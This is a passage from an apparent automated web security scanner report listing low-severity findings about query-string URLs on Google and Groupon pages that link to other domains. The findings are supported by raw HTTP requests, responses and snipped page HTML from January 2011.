Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:40:13 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>p - Google Search</title><script>window.google={kEI:"bas9TefyMISclgfpj8GrBw",kEXPI:"17259,17291,23961,27615
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=p&um=1&ie=UTF-8&sa=N&tab=v1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a id="v1483871646885698228" href="/url?q=http://www.youtube.com/watch%3Fv%3DFJfFZqTlWrQ&sa=X&ei=bas9TefyMISclgfpj8GrBw&ved=0CDEQuAIwAA&usg=AFQjCNFPptfPfCpn91b_gJ1pgRii4FelUA" ><img src="http://img.youtube.com/vi/FJfFZqTlWrQ/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb1 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=FJfFZqTlWrQ" class=l onmousedown="return clk(this.href,'','1483871646885698228','','1','','0CDAQtwIwAA')"><em>
...[SNIP]...
<a id="v368787471398008195" href="/url?q=http://www.youtube.com/watch%3Fv%3DBR4yQFZK9YM&sa=X&ei=bas9TefyMISclgfpj8GrBw&ved=0CDUQuAIwAQ&usg=AFQjCNEYQCzr7BYkiSWqpqaYDrkE8Wq9Sg" ><img src="http://img.youtube.com/vi/BR4yQFZK9YM/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb2 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=BR4yQFZK9YM" class=l onmousedown="return clk(this.href,'','368787471398008195','','2','','0CDQQtwIwAQ')"><em>
...[SNIP]...
<a id="v8829028052215966554" href="/url?q=http://www.youtube.com/watch%3Fv%3DeocCPDxKq1o&sa=X&ei=bas9TefyMISclgfpj8GrBw&ved=0CDkQuAIwAg&usg=AFQjCNFTycnYQcyu5ewJJP8a4wGhW7vYAg" ><img src="http://img.youtube.com/vi/eocCPDxKq1o/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=eocCPDxKq1o" class=l onmousedown="return clk(this.href,'','8829028052215966554','','3','','0CDgQtwIwAg')"><em>
...[SNIP]...
<a id="v4602705220286849378" href="/url?q=http://www.youtube.com/watch%3Fv%3DP-AYAv0IoWI&sa=X&ei=bas9TefyMISclgfpj8GrBw&ved=0CD0QuAIwAw&usg=AFQjCNHCF0Jrk5uOtmxdjapS2IZBJeznGg" ><img src="http://img.youtube.com/vi/P-AYAv0IoWI/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb4 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=P-AYAv0IoWI" class=l onmousedown="return clk(this.href,'','4602705220286849378','','4','','0CDwQtwIwAw')">Sweet Child O' Mine Music Video</a>
...[SNIP]...
<h3 class=r><a href="http://www.pp2g.tv/va396YnI_.aspx" class=l onmousedown="return clk(this.href,'','6939374973119908691','','5','','0CEAQtwIwBA')">Pleasure <em>
...[SNIP]...
<h3 class=r><a href="http://vimeo.com/7743200" class=l onmousedown="return clk(this.href,'','11786434714553041377','','6','','0CEQQtwIwBQ')" title="The Horsemen P-51 Mustang Flying Legends Duxford 2009">The Horsemen <em>
...[SNIP]...
<h3 class=r><a href="http://www.spike.com/video/978359" class=l onmousedown="return clk(this.href,'','4121787078203026266','','7','','0CEgQtwIwBg')">A & <em>
...[SNIP]...
<h3 class=r><a href="http://www.southparkstudios.com/clips/185672" class=l onmousedown="return clk(this.href,'','4198850822176723815','','8','','0CEwQtwIwBw')" title="P. Diddy's Ditty (Season 8, Episode 8) - Video Clips - ..."><em>
...[SNIP]...
<a id="v-7161329016140265896" href="/url?q=http://www.youtube.com/watch%3Fv%3DnJ3ZM8FDBlg&sa=X&ei=bas9TefyMISclgfpj8GrBw&ved=0CFEQuAIwCA&usg=AFQjCNH3t3c9CQGpBflCUxwHGvmo2rtELQ" ><img src="http://img.youtube.com/vi/nJ3ZM8FDBlg/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb9 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=nJ3ZM8FDBlg" class=l onmousedown="return clk(this.href,'','11285415057569285720','','9','','0CFAQtwIwCA')"><em>
...[SNIP]...
<h3 class=r><a href="http://www.channel4.com/programmes/peep-show/4od" class=l onmousedown="return clk(this.href,'','10209197322513766672','','10','','0CFQQtwIwCQ')">Peep Show</a>
...[SNIP]...

20.677. http://www.google.com/support/chrome/bin/answer.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/support/chrome/bin/answer.py

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/support/chrome/bin/answer.py?answer=95671&hl=en

The response contains the following links to other domains:

http://chrome.blogspot.com/
http://googlechromereleases.blogspot.com/?source=ln
http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Fchrome%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D95671%26ctx%3Dshare&tt=%22Oops%21+This+link+appears+broken.%22
http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Fchrome%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D95671%26ctx%3Dshare&n=%22Oops%21+This+link+appears+broken.%22
http://www.facebook.com/googlechrome
http://www.google-analytics.com/ga.js
http://www.whatbrowser.org/
http://www.youtube.com/v/BrXPcaRlBqo&hl=en&fs=1&&enablejsapi=1&playerapiid=WhatIsBrowserDownload

Request

GET /support/chrome/bin/answer.py?answer=95671&hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D1048c45e2d599fb4%26v%3D2%26c%3De93dbe18%26s%3D4d3e1337%26t%3DA%3A0%3A95671%26sessref%3D; Expires=Tue, 25-Jan-2011 00:33:04 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Tue, 25 Jan 2011 00:03:04 GMT
Expires: Tue, 25 Jan 2011 00:03:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
<li class="LeftNav_HelpCenterReleaseNotes first">
<a href="http://googlechromereleases.blogspot.com/?source=ln" onclick="track('LeftNav', 'HelpCenterReleaseNotes');">Google Chrome release notes</a>
...[SNIP]...
<li class="LeftNav_HelpCenterBlog">
<a href="http://chrome.blogspot.com" onclick="track('LeftNav', 'HelpCenterBlog');">Google Chrome blog</a>
...[SNIP]...
<li class="LeftNav_Facebook">
<a href="http://www.facebook.com/googlechrome" onclick="track('LeftNav', 'Facebook');">Chrome on Facebook</a>
...[SNIP]...
<li class="LeftNav_HelpCenterBrowser">
<a href="http://www.whatbrowser.org/" onclick="track('LeftNav', 'HelpCenterBrowser');">Whatbrowser.org</a>
...[SNIP]...
<li style="background-image:url(//www.google.com/images/icons/product/blogger-16.png);">
<a href="http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Fchrome%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D95671%26ctx%3Dshare&n=%22Oops%21+This+link+appears+broken.%22"
onclick="track('Page Actions',
'Share - Blogger')"
target="_blank">Blogger</a>
...[SNIP]...
<li style="background-image:url(//www.google.com/images/icons/product/orkut-16.png);">
<a href="http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Fchrome%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D95671%26ctx%3Dshare&tt=%22Oops%21+This+link+appears+broken.%22"
onclick="track('Page Actions',
'Share - Orkut')"
target="_blank">Orkut</a>
...[SNIP]...
<center>
<object type="application/x-shockwave-flash" data="http://www.youtube.com/v/BrXPcaRlBqo&hl=en&fs=1&%26enablejsapi=1%26playerapiid=WhatIsBrowserDownload" width="280"
height="180" id="WhatIsBrowserDownload">
<param name="src" value="http://www.youtube.com/v/BrXPcaRlBqo&hl=en&fs=1&%26enablejsapi=1%26playerapiid=WhatIsBrowserDownload" />
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'></script>
...[SNIP]...

20.678. http://www.google.com/support/websearch/bin/answer.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/support/websearch/bin/answer.py

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/support/websearch/bin/answer.py?answer=186645&hl=en&form=bb

The response contains the following link to another domain:

http://www.google-analytics.com/ga.js

Request

GET /support/websearch/bin/answer.py?answer=186645&hl=en&form=bb HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3Db05508fc5fd1fa4%26v%3D2%26c%3D59402611%26s%3D4d3dab57%26t%3DA%3A0%3A186645%26sessref%3D; Expires=Mon, 24-Jan-2011 17:09:52 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 16:39:52 GMT
Expires: Mon, 24 Jan 2011 16:39:52 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'></script>
...[SNIP]...

20.679. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=1&ved=0CCQQFjAA&url=http%3A%2F%2Fwww.freebsd.org%2Fports%2Fnews.html&ei=pZI9TfOKFcH_lgf0opSUBw&usg=AFQjCNE5GHommdv46VxwbgrvFtWCAat5tA

The response contains the following link to another domain:

http://www.freebsd.org/ports/news.html

Request

GET /url?sa=t&source=web&cd=1&ved=0CCQQFjAA&url=http%3A%2F%2Fwww.freebsd.org%2Fports%2Fnews.html&ei=pZI9TfOKFcH_lgf0opSUBw&usg=AFQjCNE5GHommdv46VxwbgrvFtWCAat5tA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 302 Found
Location: http://www.freebsd.org/ports/news.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 14:54:33 GMT
Server: gws
Content-Length: 235
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.freebsd.org/ports/news.html">here</A>
...[SNIP]...

20.680. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?url=http://www.youtube.com/watch%3Fv%3D&rct=j&sa=X&ei=4AT0T

The response contains the following link to another domain:

http://www.youtube.com/watch?v=

Request

GET /url?url=http://www.youtube.com/watch%3Fv%3D&rct=j&sa=X&ei=4AT0T HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:40:04 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<body><a href="http://www.youtube.com/watch?v=" id=link target=_parent></body><script>var a=parent,b=parent.google,c=location;if(a!=window&&b){if(b.r){b.r=0;document.getElementById("link").click();}}e
...[SNIP]...

20.681. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&ei=kpI9TcPtJYP6lwf-z4DqBQ&usg=AFQjCNGUi3C6Dl7duUZzojASxTnivAMCAw

The response contains the following link to another domain:

http://linux.maruhn.com/sec/aub.html

Request

GET /url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&ei=kpI9TcPtJYP6lwf-z4DqBQ&usg=AFQjCNGUi3C6Dl7duUZzojASxTnivAMCAw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 302 Found
Location: http://linux.maruhn.com/sec/aub.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 14:54:16 GMT
Server: gws
Content-Length: 233
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://linux.maruhn.com/sec/aub.html">here</A>
...[SNIP]...

20.682. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=2&ved=0CCsQFjAB&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&ei=pZI9TfOKFcH_lgf0opSUBw&usg=AFQjCNECWp14hodR9dtEDuYY7b8bZ8CRoA

The response contains the following link to another domain:

http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html

Request

GET /url?sa=t&source=web&cd=2&ved=0CCsQFjAB&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&ei=pZI9TfOKFcH_lgf0opSUBw&usg=AFQjCNECWp14hodR9dtEDuYY7b8bZ8CRoA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 302 Found
Location: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 14:54:36 GMT
Server: gws
Content-Length: 273
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html">here</A>
...[SNIP]...

20.683. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=3&ved=0CCYQFjAC&url=http%3A%2F%2Fmako.cc%2Fprojects%2Faub%2F&ei=kpI9TcPtJYP6lwf-z4DqBQ&usg=AFQjCNFQESCJL7PN0mu6oprm0-NkOa73Sg

The response contains the following link to another domain:

http://mako.cc/projects/aub/

Request

GET /url?sa=t&source=web&cd=3&ved=0CCYQFjAC&url=http%3A%2F%2Fmako.cc%2Fprojects%2Faub%2F&ei=kpI9TcPtJYP6lwf-z4DqBQ&usg=AFQjCNFQESCJL7PN0mu6oprm0-NkOa73Sg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 302 Found
Location: http://mako.cc/projects/aub/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 14:54:22 GMT
Server: gws
Content-Length: 225
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://mako.cc/projects/aub/">here</A>
...[SNIP]...

20.684. http://www.google.com/webhp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/webhp

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/webhp?hl=en&tab=ww

The response contains the following link to another domain:

http://www.youtube.com/?hl=en&tab=w1

Request

GET /webhp?hl=en&tab=ww HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:48 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: __utmz=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=www.google.com
Set-Cookie: __utma=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=www.google.com
Set-Cookie: __utmz=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=.www.google.com
Set-Cookie: __utma=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=.www.google.com
Set-Cookie: __utmz=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=google.com
Set-Cookie: __utma=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=google.com
Set-Cookie: __utmz=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=.google.com
Set-Cookie: __utma=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=.google.com
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google</title><script>window.google={kEI:"VKs9TZahEYeqeOWzuPcD",kEXPI:"17259,17291,27615,28186,2823
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.685. http://www.groupon.com/washington-dc/subscribe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.groupon.com
Path:	/washington-dc/subscribe

Issue detail

The page was loaded from a URL containing a query string:

http://www.groupon.com/washington-dc/subscribe?utm_source=Google&utm_medium=cpc&utm_campaign=Explorer&d=District_of_Columbia_-_Washington&p=joomlacode.org&a=Text/

The response contains the following links to other domains:

http://ads.bluelithium.com/pixel?id=620625&t=2
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js
http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.js
http://assets1.grouponcdn.com/assets/subscriptions.js?B1519gUv
http://assets1.grouponcdn.com/images/groupon/landing_pages/confirm_city.gif?4UuFdEOc
http://assets1.grouponcdn.com/images/groupon/landing_pages/enter_email.gif?fyP2Y5Ml
http://assets1.grouponcdn.com/images/groupon/landing_pages/save_on_deals_blue4.gif?D9Bsq0Tc
http://assets1.grouponcdn.com/images/groupon/landing_pages/step_1.gif?UNq811WL
http://assets1.grouponcdn.com/images/groupon/landing_pages/step_2.gif?kNhmeTIh
http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC
http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?mFqOEBi1
http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?vGis9EFL
http://assets1.grouponcdn.com/stylesheets/app/landing/index.css?zm9BnoJf
http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_two_steps10.css?hm_Wnumm
http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=washington-dc;u2=;ord=1?
http://pixel.33across.com/ps/?pid=263&cgn=13441&seg=3420
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1019040093/?label=U-p3CPOX4wEQ3aL15QM&script=0

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 25 Jan 2011 04:41:06 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: utm_content=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_medium=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpmed=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_term=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_campaign=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: b=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: external_uid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpoid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref2=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpuid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_source=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpcid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpaid=Google; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
Set-Cookie: adchemy_id=Explorer; path=/
Set-Cookie: _tpmed=cpc; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
Set-Cookie: _tpcid=Explorer; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
Set-Cookie: division=washington-dc; path=/; expires=Fri, 25-Feb-2011 04:41:06 GMT
Set-Cookie: area=dc-metro; path=/; expires=Fri, 25-Feb-2011 04:41:06 GMT
Set-Cookie: b=525bb898-283d-11e0-a3b5-005056957e9b; path=/; expires=Mon, 25-Jan-2021 04:41:06 GMT
Set-Cookie: s=525bc5ae-283d-11e0-a3b5-005056957e9b; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: opt_default=7980234323; path=/; expires=Fri, 25-Jan-2013 04:41:06 GMT
Set-Cookie: opt_7980234323_v=0; path=/; expires=Fri, 25-Jan-2013 04:41:06 GMT
